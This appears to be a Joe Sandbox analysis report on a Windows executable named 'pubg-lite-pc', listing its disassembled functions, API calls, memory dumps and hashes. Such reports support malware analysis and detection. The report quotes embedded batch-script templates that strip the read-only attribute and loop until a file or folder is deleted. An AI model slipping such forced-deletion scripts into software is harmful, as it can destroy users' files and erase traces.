                                                                                                • kernel32, xrefs: 0099DA8E
                                                                                                • comctl32.dll, xrefs: 0099DC62
                                                                                                • user32.dll, xrefs: 0099DC87
                                                                                                • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 0099DA27
                                                                                                • kernel32.dll, xrefs: 0099DCDB
                                                                                                • SetDefaultDllDirectories, xrefs: 0099DB8B
                                                                                                • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 0099DA02
                                                                                                • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 0099DA07, 0099DA0F
                                                                                                • SetSearchPathMode, xrefs: 0099DAD5
                                                                                                • SetDllDirectory, xrefs: 0099DB30
                                                                                                • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 0099DA20, 0099DA2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$DirectoryHandleHeapModuleProcessSystem
                                                                                                • String ID: @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$comctl32.dll$kernel32$kernel32.dll$user32.dll
                                                                                                • API String ID: 1457326328-776541459
                                                                                                • Opcode ID: 90a4c6bbfec82ba769c219395a585f2593d92753bdbef3133ac579c40f04a101
                                                                                                • Instruction ID: 2f830e66d0b8e0b707fc000c267d837470e9307defc2a842b9bfb1e64268ec5b
                                                                                                • Opcode Fuzzy Hash: 90a4c6bbfec82ba769c219395a585f2593d92753bdbef3133ac579c40f04a101
                                                                                                • Instruction Fuzzy Hash: 59A138B0D01648EBDB10DF69D889BEEBBFCFB04714F104258E418AB292DBB55A48CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00974540 Relevance: 21.4, APIs: 14, Instructions: 368COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0097482D
                                                                                                • IsWindow.USER32(?), ref: 00974918
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallProc
                                                                                                • String ID:
                                                                                                • API String ID: 883168683-0
                                                                                                • Opcode ID: 7e93009da5dbeb22610736073b77782f36127f3033d45a35172c5ea3a0654510
                                                                                                • Instruction ID: de1c350d8c788939dd557a8b99210d51db384e22f7deaa3c34e4c38c071e1d85
                                                                                                • Opcode Fuzzy Hash: 7e93009da5dbeb22610736073b77782f36127f3033d45a35172c5ea3a0654510
                                                                                                • Instruction Fuzzy Hash: D4E16E72A00208DFDF24DF68CD88BAE7FB9FF48710F108169E909AB296D7759944CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0095D460 Relevance: 21.2, APIs: 14, Instructions: 242COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0095D4CE
                                                                                                • SetWindowLongW.USER32(?,000000F0,00C80000), ref: 0095D4FC
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0095D511
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0095D548
                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0095D575
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0095D589
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0095D5AB
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0095D5C2
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0095D5D6
                                                                                                • GetWindowRect.USER32(?,?), ref: 0095D626
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0095D64C
                                                                                                • GetWindowRect.USER32(?,?), ref: 0095D69A
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000604,?,?), ref: 0095D6D0
                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0095D70A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$Rect$Text
                                                                                                • String ID:
                                                                                                • API String ID: 445026432-0
                                                                                                • Opcode ID: 03aa3f982e66dda71de5221592ff581da83ecb6ad669284d6d38b4d5b67c4510
                                                                                                • Instruction ID: 2e767d8478a3b86972b32e1aca4245f80e3abd13daddb5fc4c99578d0f85933d
                                                                                                • Opcode Fuzzy Hash: 03aa3f982e66dda71de5221592ff581da83ecb6ad669284d6d38b4d5b67c4510
                                                                                                • Instruction Fuzzy Hash: B7916E71A016099FDB14CFA8CD49BEEBBB5FF58310F204229F816E72A4DB31A955CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0095B0A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 202windowthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00B035C4), ref: 0095B147
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0095B15A
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0095B1D3
                                                                                                • SetLastError.KERNEL32(0000000E), ref: 0095B1F9
                                                                                                • GetLastError.KERNEL32 ref: 0095B1FF
                                                                                                • CreateDialogParamW.USER32(0000278B,?,00964070,00000000,?), ref: 0095B232
                                                                                                • GetLastError.KERNEL32(?,000000FF,00000000,00000000), ref: 0095B23C
                                                                                                • ShowWindow.USER32(?,0000000A,?,000000FF,00000000,00000000), ref: 0095B24E
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0095B274
                                                                                                • TranslateMessage.USER32(?), ref: 0095B2C1
                                                                                                • DispatchMessageW.USER32(?), ref: 0095B2CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastMessage$CriticalSection$CreateCurrentDialogDispatchEnterLeaveParamPeekShowThreadTranslateWindow
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3352113381-1809401727
                                                                                                • Opcode ID: aa855450c0d902f0917f7c6a499ce3ed982734ef8831f7b1bfcf96268f7ea17e
                                                                                                • Instruction ID: a4e927cb207ce96fea81b5cb014ad77e7eebc4666951a1ec2bfa9cfc3cec0c9a
                                                                                                • Opcode Fuzzy Hash: aa855450c0d902f0917f7c6a499ce3ed982734ef8831f7b1bfcf96268f7ea17e
                                                                                                • Instruction Fuzzy Hash: F7817E71900309DFDB10CFA9CD49B9EBBF8FF19714F144119E915AB291DB74AA09CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092FF50 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 359stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$LongParentlstrcmp
                                                                                                • String ID: #32770
                                                                                                • API String ID: 4031819654-463685578
                                                                                                • Opcode ID: 5da0dfcc42040a2d73cf92d7ab08bb1e241133ad764ee1f8cf6e8d61b8c750e9
                                                                                                • Instruction ID: bb99d1c7d614cba41979db65c35307f62bf830509acb6a41bc34b809780db8d6
                                                                                                • Opcode Fuzzy Hash: 5da0dfcc42040a2d73cf92d7ab08bb1e241133ad764ee1f8cf6e8d61b8c750e9
                                                                                                • Instruction Fuzzy Hash: 98E19070E04219EFDB14CFA4C858BAEBBB9BF89710F148159F811AB2A1DB749D44CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B87C0 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 222threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(00B03610,F4D3B90A,?,?,00000000,?,?,?,?,?,00000000,00A81387,000000FF), ref: 009B8833
                                                                                                • EnterCriticalSection.KERNEL32(?,F4D3B90A,?,?,00000000,?,?,?,?,?,00000000,00A81387,000000FF), ref: 009B8845
                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,00A81387,000000FF), ref: 009B8852
                                                                                                • GetCurrentThread.KERNEL32 ref: 009B885D
                                                                                                • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,00000000,?,00AA9988,00000000,?,?,?,?,?,00000000,00A81387,000000FF), ref: 009B8A24
                                                                                                • LeaveCriticalSection.KERNEL32(?,00AA9988,00000000,?,?,?,?,?,00000000,00A81387,000000FF), ref: 009B8B03
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Current$EnterHandleInitializeLeaveModuleProcessThread
                                                                                                • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$@,w$MODULE_BASE_ADDRESS$[0x%.8Ix]
                                                                                                • API String ID: 3051236879-3680706655
                                                                                                • Opcode ID: 404186c3a8bd657c9ccf0ec86a8b8e50e34438b1a11ce70b872de08c83e4c23a
                                                                                                • Instruction ID: 1bbdb7a1c2fb1a2cad69f021339556a114729511658e2bfefe33639eb8737359
                                                                                                • Opcode Fuzzy Hash: 404186c3a8bd657c9ccf0ec86a8b8e50e34438b1a11ce70b872de08c83e4c23a
                                                                                                • Instruction Fuzzy Hash: 98917B71904288AFDF25DFA4CD45BEE7BB8BF49304F000169E949AB291DBB55B08CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00974060 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 206windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00974095
                                                                                                • GetParent.USER32 ref: 009740F7
                                                                                                • SendMessageW.USER32(00000000,0000004E,00000000,?), ref: 00974107
                                                                                                • SendMessageW.USER32(?,?,?), ref: 00974277
                                                                                                • GetDlgItem.USER32(?,?), ref: 009742B6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CursorItemLoadParent
                                                                                                • String ID:
                                                                                                • API String ID: 2490122124-3916222277
                                                                                                • Opcode ID: 331a3136d166f3c4fe7ac48d8434846c1a3918f8cad7c60e83bdce3335ea1c41
                                                                                                • Instruction ID: 20cd8ede62330a8c322f8313923335ce49a2d4141f040732058f43cca07fa485
                                                                                                • Opcode Fuzzy Hash: 331a3136d166f3c4fe7ac48d8434846c1a3918f8cad7c60e83bdce3335ea1c41
                                                                                                • Instruction Fuzzy Hash: E871E272604305CFDB24CF14D898B6A77A5FF64310F008659F86A8B6A3D775EC94CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00974D90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 158libraryloaderwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                  • Part of subcall function 00976450: SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,F4D3B90A,?,?), ref: 009764CA
                                                                                                  • Part of subcall function 00976450: CreateWindowExW.USER32(00000000,SysHeader32,00000000,50000080,?,?,?,?,?,00000000,00000000,?), ref: 00976540
                                                                                                  • Part of subcall function 00976450: CreateWindowExW.USER32(00000000,SysHeader32,00000000,40000000,?,?,?,?,?,00000002,00000000), ref: 00976578
                                                                                                  • Part of subcall function 00976450: CreateWindowExW.USER32(00000000,SCROLLBAR,00000000,50000004,?,?,?,?,?,00000003,00000000), ref: 009765B0
                                                                                                  • Part of subcall function 00975610: GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00975678
                                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00974E64
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00974EB7
                                                                                                • SendMessageW.USER32(00000000,0000112C,00000004,00000004), ref: 00974EF3
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00974F23
                                                                                                • FreeLibrary.KERNEL32(F4D3B90A), ref: 00974F5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressCriticalProcSectionWindow$Create$EnterLeave$ConditionErrorFreeLastLibraryLongMessageSendVariableWake
                                                                                                • String ID: DllGetVersion$GetWindowTheme$SetWindowTheme$comctl32.dll$explorer
                                                                                                • API String ID: 4117535081-695539450
                                                                                                • Opcode ID: 1b23b0243d87d9d4478b455881fbdc5a7e35388f77b8b844598dce10865b7578
                                                                                                • Instruction ID: 5b89661eba408dd5ce0093d2299513f78f13fd189c07dbca041f0d4345b40a67
                                                                                                • Opcode Fuzzy Hash: 1b23b0243d87d9d4478b455881fbdc5a7e35388f77b8b844598dce10865b7578
                                                                                                • Instruction Fuzzy Hash: 0B51A271E00708ABDB10EF78DD45B9AB7F9FF54710F148229E91AA7292EF70A9108B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009640E0 Relevance: 16.7, APIs: 11, Instructions: 170COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00964127
                                                                                                • GetParent.USER32 ref: 0096413D
                                                                                                • GetWindowRect.USER32(?,?), ref: 00964148
                                                                                                • GetParent.USER32(?), ref: 00964150
                                                                                                • GetWindow.USER32(?,00000004), ref: 00964182
                                                                                                • GetWindowRect.USER32(?,?), ref: 00964190
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0096419D
                                                                                                • MonitorFromWindow.USER32(?,00000002), ref: 009641B5
                                                                                                • GetMonitorInfoW.USER32(00000000,00000004), ref: 009641CF
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 0096427D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$LongMonitorParentRect$FromInfo
                                                                                                • String ID:
                                                                                                • API String ID: 1820395375-0
                                                                                                • Opcode ID: e32d654f6c1d4b3723f8046a548b994f6be923cee1a6806bd50aea7e0a63c14e
                                                                                                • Instruction ID: ba965cf1419be1b6a8edb69c98ee97582a7b524cd1637bb468def36e66a13821
                                                                                                • Opcode Fuzzy Hash: e32d654f6c1d4b3723f8046a548b994f6be923cee1a6806bd50aea7e0a63c14e
                                                                                                • Instruction Fuzzy Hash: 46515F72D042199FDB24CFA8CD49ADEBBB9FB58710F254229E815F3294DB30AD45CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DE6D0 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 296libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009749D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00974A11
                                                                                                • GetLastError.KERNEL32(F4D3B90A,?,?,?,000000FF,?,009C3826,?,?), ref: 009DE73D
                                                                                                • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 009DE8CA
                                                                                                • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 009DE92E
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,000000FF,?,009C3826,?,?), ref: 009DEA22
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$DirectoryErrorFreeLastLibrarySystem
                                                                                                • String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
                                                                                                • API String ID: 2155880084-4043905686
                                                                                                • Opcode ID: 22ac4e17fb00aa42e6238dcc932c82047b516e21a68c78cdf99c6f0523708a00
                                                                                                • Instruction ID: bdf754dd17c11c2fa195c2d1c5b71e47d10ab85195e1e0fac0eaf63c5255f346
                                                                                                • Opcode Fuzzy Hash: 22ac4e17fb00aa42e6238dcc932c82047b516e21a68c78cdf99c6f0523708a00
                                                                                                • Instruction Fuzzy Hash: 4CC15C70A01209DFDB14DFA8C994BAEBBB5FF58314F14826EE815AB391DB74AD01CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A016A0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 282COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Enabled$Progress$PropertyValue$Text$TimeRemaining$Visible
                                                                                                • API String ID: 0-2691827946
                                                                                                • Opcode ID: a4da70a96a5228f9f45837d7f3cc40e9c4889e264cfdd23a4b1bb39bc0b86efa
                                                                                                • Instruction ID: 184d023c2677a40de7c922cefc644bf24d5c8509917d7046ccdff2e6de4b05d3
                                                                                                • Opcode Fuzzy Hash: a4da70a96a5228f9f45837d7f3cc40e9c4889e264cfdd23a4b1bb39bc0b86efa
